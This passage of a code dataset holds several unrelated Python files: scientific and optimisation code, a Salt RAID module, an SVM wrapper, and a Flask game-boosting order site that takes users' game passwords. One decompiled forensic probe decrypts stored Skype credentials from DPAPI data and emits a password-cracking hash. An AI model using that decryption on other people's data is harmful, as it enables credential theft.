total_load_loss_risk * prob * Cost_kWh * restoration_time\r\n if Reliability_Risk_Cost == 0:\r\n #Solve for total distance and calc cost\r\n total_distance = 0\r\n for i in range(num_poles):\r\n for j in range(0,i):\r\n if OnOff[i,j] == 1:\r\n total_distance = total_distance + DistancesBWPoles[i,j]\r\n Wire_Cost = total_distance * wiring_trans_cost\r\n Best_Total_Cost = Wire_Cost+Reliability_Risk_Cost #save as current best\r\n goodToGo = 1\r\n else:\r\n num_conn_per_pole += 1\r\n else:\r\n num_conn_per_pole += 1 #This is occasionally exceeding number of poles, need to put in error fixing block\r\n Best_Reliability_Cost = np.copy(Reliability_Risk_Cost)\r\n Best_Wire_Cost = np.copy(Wire_Cost)\r\n Best_total_distance = np.copy(total_distance) \r\n \r\n #Remove connections, starting with longest working towards shortest, check to make sure not creating islands\r\n DistancesBWPoles_in_use = DistancesBWPoles_sorted[:,1:num_conn_per_pole] #truncate\r\n DistancesBWPoles_in_use = DistancesBWPoles_in_use.flatten() #flatten\r\n DistancesBWPoles_in_use = np.sort(DistancesBWPoles_in_use) #sort\r\n for k in range(len(DistancesBWPoles_in_use)-1,-1,-1):\r\n OnOff_temp = np.copy(OnOff)\r\n ind = np.where(DistancesBWPoles == DistancesBWPoles_in_use[k])\r\n x = ind[0][0]\r\n y = ind[1][0]\r\n OnOff_temp[x,y] = 0\r\n OnOff_temp[y,x] = 0 #make other matching pair 0 as well\r\n # Check for islands\r\n components, visited = ConnectedComponents(OnOff_temp)\r\n if components == 1: #no islands, Only move forward with best solution if no islands\r\n # Calculate Load loss risk\r\n Edges = LineLosses(OnOff_temp,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles)\r\n total_load_loss_risk = sum(Edges[:,2])\r\n Reliability_Risk_Cost = total_load_loss_risk * prob * Cost_kWh * restoration_time\r\n if Reliability_Risk_Cost == 0:\r\n #Solve for total distance and calc cost\r\n total_distance = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff_temp[i,j] == 1:\r\n total_distance = total_distance + DistancesBWPoles[i,j]\r\n Wire_Cost = total_distance * wiring_trans_cost\r\n Total_Cost = Wire_Cost+Reliability_Risk_Cost\r\n if Total_Cost < Best_Total_Cost: #Save best solution based on no islands and lowest cost\r\n OnOff = np.copy(OnOff_temp)\r\n Best_Total_Cost = np.copy(Total_Cost)\r\n Best_Reliability_Cost = np.copy(Reliability_Risk_Cost)\r\n Best_Wire_Cost = np.copy(Wire_Cost)\r\n Best_total_distance = np.copy(total_distance) \r\n #print(Best_Total_Cost)\r\n #print(Best_Reliability_Cost)\r\n #print(\"********************\")\r\n \r\n t1 = 
time.time()\r\n total_time = t1-t0\r\n \r\n return Best_total_distance,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time\r\n \r\n#==============================================================================\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #Set Inputs for optimizations\r\n Net_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Net')\r\n reformatScaler = int(Net_Parameters['reformatScaler'][0]) #parameter to decrease the resolution of image (speeds up processing)\r\n exclusionBuffer = int(Net_Parameters['exclusionBuffer'][0])#meters that poles need to be form exclusions (other poles, exclusions, and connections)\r\n MaxDistancePoleConn = int(Net_Parameters['MaxDistancePoleConn'][0])#(m) the maximum distance allowed for a pole to be from a connection\r\n minPoles = int(Net_Parameters['minPoles'][0])\r\n maxPoles = int(Net_Parameters['maxPoles'][0])\r\n range_limit = int(Net_Parameters['range_limit'][0])\r\n repeats = int(Net_Parameters['repeats'][0])\r\n global prob\r\n prob = Net_Parameters['prob'][0]\r\n Cost_kWh = Net_Parameters['Cost_kWh'][0] #Change this to input from uGrid \r\n restoration_time = int(Net_Parameters['restoration_time'][0])\r\n #Load all Econ input\r\n Econ_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Econ')\r\n wiring_trans_cost = Econ_Parameters['Cost_Trans_wire'][0]/1000 #go from per km to per m\r\n \r\n LoadKW_MAK = pd.read_excel('LoadKW_MAK.xlsx',index_col=None, header=None)\r\n global kW_max\r\n kW_max = max(LoadKW_MAK[0])\r\n \r\n #Run Pole Placement Optimization, output is saved as csv files \r\n Best_Reliability_Cost, OnOff, num_initial_clusters,ConnPole_soln, total_wire_distance_soln, total_trans_wire_distance_soln, indexes_poles_soln, totalCost_soln, indexes_conn, indexes_excl = PoleOpt(reformatScaler,minPoles,maxPoles,exclusionBuffer,range_limit,MaxDistancePoleConn,repeats,prob, Cost_kWh, wiring_trans_cost, restoration_time) \r\n PlotPoleSolutions(OnOff,indexes_poles_soln,indexes_conn,indexes_excl,ConnPole_soln)\r\n \r\n if max(ConnPole_soln[:,1]) > MaxDistancePoleConn:\r\n print(\"Distances between houses and poles is too far, the farthest is \"+str(max(ConnPole_soln[:,1]))+\"m. 
Increase the maximum limit for number of poles\")\r\n \r\n #Save total cost\r\n Costs = [Best_Reliability_Cost, totalCost_soln,total_wire_distance_soln, total_trans_wire_distance_soln]\r\n filename = \"Costs_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,Costs, delimiter=\",\")\r\n \r\n #Run Wiring Optimization as Standalone with previous solution\r\n #total_distance, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"True\")\r\n\r\n\r\n \r\n","sub_path":"uGridNet/Reliability/uGrid_Net_FullReliability.py","file_name":"uGrid_Net_FullReliability.py","file_ext":"py","file_size_in_byte":40543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343087868","text":"#-*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy import integrate\nimport tqdm\nimport numba \nimport multiprocessing as mp\n\n@numba.jit(nopython=True)\ndef e(x, y, z, t1, t2, t4):\n return 2 * (t1 * (np.cos(x) + np.cos(y) + np.cos(z)) + t4 * (np.cos(2 * x) + np.cos(2 * y) + np.cos(2 * z)) \n + 2 * t2 * (np.cos(x) * np.cos(y) + np.cos(z) * np.cos(x) + np.cos(y) * np.cos(z)))\n@numba.jit(nopython=True)\ndef g0_real(x, y, z, t1, t2, t4, wn, sigma, mu):\n return (mu - e(x, y, z, t1, t2, t4) - sigma.real) / ((mu - e(x, y, z, t1, t2, t4) - sigma.real) ** 2 + (-wn + sigma.imag) ** 2)\n@numba.jit(nopython=True)\ndef g0_imag(x, y, z, t1, t2, t4, wn, sigma, mu):\n return (-wn + sigma.imag) / ((mu - e(x, y, z, t1, t2, t4) - sigma.real) ** 2 + (-wn + sigma.imag) ** 2)\n\ndef f(funcs, args, x, opt, _dict, k): \n return _integrate(funcs, args, x, opt, _dict, k)\n\ndef _integrate(funcs, args, x, opt, _dict, k):\n real = integrate.nquad(funcs[0], [x] * 3, args=args, opts=opt)\n imag = integrate.nquad(funcs[1], [x] * 3, args=args, opts=opt)\n _dict[k] = real[0] + 1j * imag[0]\n return _dict\n\ndef g_imp(t1, t2, t4, wn, num_iw, sigma=0, mu=0, limit=50):\n g0 = np.zeros(num_iw, dtype=np.complex64)\n if type(sigma) == int:\n sigma = np.zeros(num_iw, dtype=np.complex64)\n V = 8 * np.pi**3\n opt = {'limit' : limit, 'epsrel' : 1e-8, 'epsabs' : 1e-8}\n x = [-np.pi, np.pi]\n m = mp.Manager()\n _dict = m.dict()\n p = [mp.Process(target=f, args=([g0_real, g0_imag], (t1, t2, t4, wn[k], sigma[k], mu), x, opt, _dict, k)) for k in range(mp.cpu_count() - 1)]\n for i in p:\n i.start()\n while k < num_iw:\n for i in range(mp.cpu_count() - 1):\n if not p[i].is_alive() and k < num_iw:\n p[i] = mp.Process(target=f, args=([g0_real, g0_imag], (t1, t2, t4, wn[k], sigma[k], mu), x, opt, _dict, k))\n p[i].start()\n k += 1\n for i in p:\n i.join()\n for k in range(num_iw):\n g0[k] = _dict[k]\n return g0 / V","sub_path":"suspy/impurity_green_function.py","file_name":"impurity_green_function.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390940873","text":"# -*- coding: utf-8 -*-\n'''\nManaging software RAID with mdadm\n==================================\n\nA state module for creating or destroying software RAID devices.\n\n.. 
code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde\n'''\n\n# Import python libs\nimport logging\n\n# Import salt libs\nimport salt.utils\n\n# Set up logger\nlog = logging.getLogger(__name__)\n\n# Define the module's virtual name\n__virtualname__ = 'raid'\n\n\ndef __virtual__():\n '''\n mdadm provides raid functions for Linux\n '''\n if __grains__['kernel'] != 'Linux':\n return False\n if not salt.utils.which('mdadm'):\n return False\n return __virtualname__\n\n\ndef present(name, opts=None):\n '''\n Verify that the raid is present\n\n name\n The name of raid device to be created\n\n opts\n The mdadm options to use to create the raid. See\n :mod:`mdadm ` for more information.\n Opts can be expressed as a single string of options.\n\n .. code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde\n\n Or as a list of options.\n\n .. code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts:\n - level=1\n - chunk=256\n - raid-devices=2\n - /dev/xvdd\n - /dev/xvde\n '''\n ret = {'changes': {},\n 'comment': '',\n 'name': name,\n 'result': True}\n\n args = [name]\n if isinstance(opts, str):\n opts = opts.split()\n\n args.extend(opts)\n\n # Device exists\n raids = __salt__['raid.list']()\n if raids.get(name):\n ret['comment'] = 'Raid {0} already present'.format(name)\n return ret\n\n # If running with test use the test_mode with create\n if __opts__['test']:\n args.extend(['test_mode=True'])\n res = __salt__['raid.create'](*args)\n ret['comment'] = 'Raid will be created with: {0}'.format(res)\n ret['result'] = None\n return ret\n\n # Attempt to create the array\n __salt__['raid.create'](*args)\n\n raids = __salt__['raid.list']()\n changes = raids.get(name)\n if changes:\n ret['comment'] = 'Raid {0} created.'.format(name)\n ret['changes'] = changes\n else:\n ret['comment'] = 'Raid {0} failed to be created.'.format(name)\n ret['result'] = False\n\n return ret\n\n\ndef absent(name):\n '''\n Verify that the raid is absent\n\n name\n The name of raid device to be destroyed\n\n .. 
code-block:: yaml\n\n /dev/md0:\n raid:\n - absent\n '''\n ret = {'changes': {},\n 'comment': '',\n 'name': name,\n 'result': True}\n\n # Raid does not exist\n if name not in __salt__['raid.list']():\n ret['comment'] = 'Raid {0} already absent'.format(name)\n return ret\n elif __opts__['test']:\n ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)\n ret['result'] = None\n return ret\n else:\n # Attempt to destroy raid\n ret['result'] = __salt__['raid.destroy'](name)\n\n if ret['result']:\n ret['comment'] = 'Raid {0} has been destroyed'.format(name)\n else:\n ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)\n return ret\n","sub_path":"salt/states/mdadm.py","file_name":"mdadm.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"12854798","text":"\"\"\"\nFast paced game of domino'o.\n\nCopyright (c) 2015 Russell E Gibson \n\"\"\"\n\n\n# import sys\n# import pdb\n# import functools\n# import traceback\n\n\ndef _dump_sequence(level, width, items, grouping, dumper=None):\n out = ''\n for index in range(0, len(items), grouping):\n out += (level + 1) * width\n for offset in range(grouping):\n if index + offset >= len(items):\n break\n if offset % grouping != 0:\n out += ', '\n if dumper is not None:\n out += dumper(items[index + offset])\n elif hasattr(items[index + offset], 'dump'):\n out += items[index + offset].dump()\n else:\n out += str(items[index + offset])\n if index + offset + 1 < len(items):\n out += ','\n out += '\\n'\n return out\n\n\n# def enable_pdb():\n# def decorator(f):\n# @functools.wraps(f)\n# def wrapper(*args, **kwargs):\n# try:\n# return f(*args, **kwargs)\n# except:\n# info = sys.exc_info()\n# traceback.print_exception(*info) \n# pdb.post_mortem(info[2])\n# return wrapper\n# return decorator\n# \n","sub_path":"bokem/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"652127520","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/DPAPI/Probes/skype.py\n# Compiled at: 2014-09-22 08:18:41\nfrom xml import etree\nimport hashlib, struct, array, M2Crypto\nfrom DPAPI import probe\nfrom DPAPI.Core import blob\n\nclass SkypeAccount(probe.DPAPIProbe):\n\n def parse(self, data):\n self.login = None\n self.cleartext = None\n self.dpapiblob = blob.DPAPIBlob(data.remain())\n self.entropy = None\n return\n\n def preprocess(self, **k):\n self.login = k.get('login')\n tree = etree.ElementTree()\n if k.get('xmlfile') is not None:\n tree.parse(k['xmlfile'])\n else:\n tree.fromstring(k['xml'])\n self.cred = tree.find('.//Account/Credentials2')\n if self.cred is None:\n self.cred = tree.find('.//Account/Credentials3')\n if self.cred is not None:\n self.cred = self.cred.text.decode('hex')\n return\n\n def postprocess(self, **k):\n if self.cred is None:\n return\n else:\n k = hashlib.sha1(struct.pack('>L', 0) + self.dpapiblob.cleartext).digest()\n k += hashlib.sha1(struct.pack('>L', 1) + self.dpapiblob.cleartext).digest()\n ciph = M2Crypto.EVP.Cipher('aes_256_ecb', k[:32], '', M2Crypto.encrypt, 0)\n arr = array.array('B')\n arr.fromstring(self.cred)\n for i in range(0, len(self.cred), 16):\n buff = ciph.update('\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + struct.pack('>L', i >> 
4))\n for j in range(min(16, len(self.cred) - i)):\n arr[(i + j)] ^= ord(buff[j])\n\n self.cleartext = arr.tostring().encode('hex')\n return\n\n def __getattr__(self, name):\n return getattr(self.dpapiblob, name)\n\n def jtr_shadow(self):\n if self.login is not None:\n return '%s:$dynamic_1401$%s' % (self.login, self.cleartext[:32])\n else:\n return ''\n\n def __repr__(self):\n s = ['Skype account']\n if self.login is not None:\n s.append(' login = %s' % self.login)\n s.append(' hash = %s' % self.cleartext[:32])\n return ('\\n').join(s)","sub_path":"pycfiles/dpapick-0.3-py2.7/skype.py","file_name":"skype.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30561231","text":"import datatable as dt\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom h2oaicore.models import CustomModel\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nfrom sklearn.svm import LinearSVC, LinearSVR\r\nfrom sklearn.base import BaseEstimator, ClassifierMixin\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nclass linsvc(BaseEstimator, ClassifierMixin):\r\n def __init__(self,\r\n random_state=1\r\n ): \r\n self.model=LinearSVC(penalty=\"l2\", loss=\"squared_hinge\", C=1.0,random_state=random_state)\r\n self.random_state=random_state\r\n self.classes_=[0,1]\r\n\r\n def fit(self, X, y, sample_weight=None):\r\n self.model.fit(X, y, sample_weight=sample_weight)\r\n \r\n return self\r\n\r\n def predict(self, X): #this predicts classification\r\n\r\n preds = self.model.predict(X ) \r\n return preds\r\n \r\n def predict_proba(self, X): \r\n X1=X.dot(self.model.coef_[0])\r\n return np.column_stack((np.array(X1)-1,np.array(X1) )) \r\n\r\n def set_params(self,random_state=1):\r\n self.model. 
set_params(random_state=random_state) \r\n \r\n def get_params(self, deep=False):\r\n return {\"random_state\":self.random_state}\r\n\r\n def get_coeff(self):\r\n return self.model.coef_[0]\r\n \r\n\r\nclass LinearSVMModel(CustomModel):\r\n \r\n _regression = True\r\n _binary = True\r\n _multiclass = False # WIP\r\n \r\n _boosters = ['linearsvm']\r\n _display_name = \"LinearSVM\"\r\n _description = \"Linear Support Vector Machine with the Liblinear method + Calibration for probabilities\"\r\n\r\n def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):\r\n X = dt.Frame(X)\r\n\r\n orig_cols = list(X.names)\r\n\r\n if self.num_classes >= 2:\r\n mod=linsvc(random_state=self.random_state)\r\n kf=StratifiedKFold(n_splits=3, shuffle=True, random_state=self.random_state)\r\n model = CalibratedClassifierCV(base_estimator=mod, method='isotonic',cv=kf) \r\n lb = LabelEncoder()\r\n lb.fit(self.labels)\r\n y = lb.transform(y)\r\n else:\r\n model = LinearSVR(epsilon=0.0, C=1.0, loss=\"epsilon_insensitive\", random_state=self.random_state)\r\n self.means = dict()\r\n self.scaler=StandardScaler()\r\n for col in X.names:\r\n XX = X[:, col]\r\n self.means[col] = XX.mean1()\r\n if np.isnan(self.means[col]):\r\n self.means[col] = 0\r\n XX.replace(None, self.means[col])\r\n X[:, col] = XX\r\n assert X[dt.isna(dt.f[col]), col].nrows == 0\r\n X = X.to_numpy()\r\n X=self.scaler.fit_transform(X)\r\n model.fit(X, y, sample_weight=sample_weight)\r\n if self.num_classes >= 2:\r\n importances=np.array([0.0 for k in range (len(orig_cols))])\r\n for classifier in model.calibrated_classifiers_ :\r\n importances+=np.array(abs(classifier.base_estimator.get_coeff()))\r\n else :\r\n importances=np.array(abs(model.coef_[0]))\r\n \r\n \r\n self.set_model_properties(model=model,\r\n features=orig_cols,\r\n importances=importances.tolist(),#abs(model.coef_[0])\r\n iterations=0)\r\n\r\n def predict(self, X, **kwargs):\r\n X = dt.Frame(X)\r\n for col in X.names:\r\n XX = X[:, col]\r\n XX.replace(None, self.means[col])\r\n X[:, col] = XX\r\n\r\n pred_contribs = kwargs.get('pred_contribs', None)\r\n output_margin = kwargs.get('output_margin', None)\r\n\r\n model, _, _, _ = self.get_model_properties()\r\n X=X.to_numpy()\r\n X=self.scaler.transform(X)\r\n if not pred_contribs:\r\n if self.num_classes == 1:\r\n preds = model.predict(X)\r\n else:\r\n preds = model.predict_proba(X)\r\n #preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())\r\n return preds\r\n else:\r\n raise NotImplementedError(\"No Shapley for SVM\")\r\n","sub_path":"models/lnrsvm.py","file_name":"lnrsvm.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"291123235","text":"# -*- coding: utf-8 -*-\nimport json\n\ndef check_float(num):\n \"\"\"\n Return True if the given number can be evaluated as float else return False\n \"\"\"\n try:\n float(num)\n return True\n except ValueError:\n return False\n\ndef create_response(data, checks, message_ok, message_error):\n \"\"\"\n Creates a HTML JSON response.\n\n Args:\n data (str):\n data to return\n checks (list):\n a list of checks that must evaluate to True\n message_ok (str):\n message to return if all checks are OK\n message_error (str):\n message to return if all checks are not OK\n\n Return:\n JSON formatted response and status code\n \"\"\"\n if all(checks):\n status_code = 200\n message = message_ok\n else:\n status_code = 500\n message = message_error\n data = 
None\n\n response = {'data': data,\n 'message': message}\n\n return json.dumps(response), status_code\n\ndef calculate_with_operator(left, right, operator):\n \"\"\"\n Calculates an answer for a math expression on the form\n 'left operator right'.\n\n Args:\n left/right (str):\n a string containing a valid number\n operator (str):\n a string describing the operator to use:\n add (addition)\n sub (subtraction)\n mult (multiplication)\n div (division)\n\n Return:\n Answer to the input given\n \"\"\"\n\n # Check input numbers\n if not all([check_float(num) for num in [left, right]]):\n # Error\n error = 'You must provide valid numbers!'\n return False, error\n\n # Convert to float\n left, right = [float(num) for num in [left, right]]\n\n # Perform calculation\n if operator == 'mult':\n ans = left * right\n elif operator == 'div':\n try:\n ans = left / right\n except ZeroDivisionError as e:\n error = 'Cannot divide by zero!'\n return False, error\n elif operator == 'add':\n ans = left + right\n elif operator == 'sub':\n ans = left - right\n else:\n error = 'Unknown operator!'\n return False, error\n\n # Return answer\n return True, ans\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613347042","text":"#encoding: utf-8\nfrom sqlalchemy import func\n\nimport apps.mcard.spider as mspider\nimport uuid\nfrom io import BytesIO\nfrom shortuuid import uuid\nimport flask\nfrom flask import views, Blueprint, send_file, request, make_response, render_template\nfrom apps.admin.models import PointCard\nfrom apps.front.forms import *\nfrom apps.front.models import SSC, ACD, DD, User\nfrom utils.captcha import Captcha\nfrom apps.front.decorators import *\nglobal g_captcha\nfrom apps.front.spider import *\nfrom tasks import send_mail\nfrom .score_log import consume_score_log\nimport config\nfrom utils.yiocached import mc\nfrom apps.mcard.models import MMCard, Member, RMCard\nfrom .models import StudioUser, StudioDD\nfrom utils.aliyun_sms import ali_sms\n\nbp = Blueprint('front_bp', __name__)\n\n\n@bp.route('/')\n@bp.route('/index/')\n@login_required\ndef index():\n return render_template('front/index.html')\n\n\nclass GlView(views.MethodView):\n decorators = [login_required]\n def get(self):\n user = g.user\n session[config.TOKEN] = config.TOKEN\n return render_template('front/gl.html', userid=user.id, score=user.score)\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n consume_score = int(form.get('consume_score'))\n buser = form.get('buser').strip()\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n type = form.get('type')\n num = form.get('num')\n id = str(random.randint(1000000000, 10000000000))\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'num': num,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n }\n\n dd = DD(buser=buser, type=type, num=num, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive, eat=eat, consume_score=consume_score)\n\n # 判断该用户是否是月卡用户,是则用月卡对应的原站账号提交订单信息\n # 如果是月卡用户,且提交的订单游戏账号为绑定的账号,则无需判断积分是否够,直接提交\n # 如果是月卡用户,且提交的订单游戏账号不为绑定的账号,则判断积分时候足够,不够则返回前端,积分不够\n # 如果用原站对应账号提交,积分够,则用原站对应的账号提交,不够还是用默认提交订单的方法提交\n # 如���不是月卡用户,则用默认提交订单数据的方法提交\n\n # 测试结果 #\n # 存在任务: 该账号已存在任务尚未完成\n # 绑定的账号提交结果: success
    扣除积分:0 当前剩余积分:199
    当前账号为绑定账号不消耗积分\n # 未绑定的账号提交结果: success
    扣除积分:1 当前剩余积分:198\n # 积分不足:积分不足,当前剩余178,本次需要185\n\n member = db.session.query(Member).filter(Member.user_id==g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n \n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n g.user.score -= dd.consume_score\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, dd.consume_score)\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nimport re\n\n\n@bp.route('/sc_select_items/', methods=['POST'])\n@login_required\ndef sc_select_items():\n parent = request.form.get('type')\n items = db.session.query(SSC).filter(SSC.parent==parent).all()\n items_dict = [item.to_dict() for item in items]\n if parent == '0':\n for item in items_dict: # 增加基础分字段\n pattern = r'.*?(\\d+).*?'\n base_score = re.search(pattern, item['name']).group(1)\n item['base_score'] = base_score\n return json.dumps(items_dict)\n\n\nclass JqView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/jq.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n misstype = form.get('misstype')\n id = str(random.randint(1000000000, 10000000000))\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'misstype': misstype\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive, eat=eat, consume_score=consume_score)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不���'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n result = request_spider(data)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, 
g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nclass ScView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/sc.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n misstype = form.get('misstype')\n num = form.get('num')\n id = str(random.randint(1000000000, 10000000000))\n\n data = {\n 'type': type,\n 'buser': buser,\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'num': num,\n 'misstype': misstype,\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive,\n eat=eat, consume_score=consume_score, num=num)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nbp.add_url_rule('/sc/', view_func=ScView.as_view('sc'))\n\n\nclass AcdView(views.MethodView):\n decorators = [login_required]\n def get(self):\n session[config.TOKEN] = config.TOKEN\n return render_template('front/acd.html')\n\n def post(self):\n return json.dumps({'status': 400, 'message': '小店数据库已经迁移升级,请登录:www.wumu.pro 提交订单'})\n\n # 判断token是否存在,防止订单重复提交\n if config.TOKEN not in session:\n return '当前页面已失效,请刷新重试'\n del session[config.TOKEN]\n\n form = request.form\n buser = form.get('buser').strip()\n type = form.get('type')\n consume_score = int(form.get('consume_score'))\n bpsw = form.get('bpsw').strip()\n dive = form.get('dive')\n eat = form.get('eat')\n misstype = 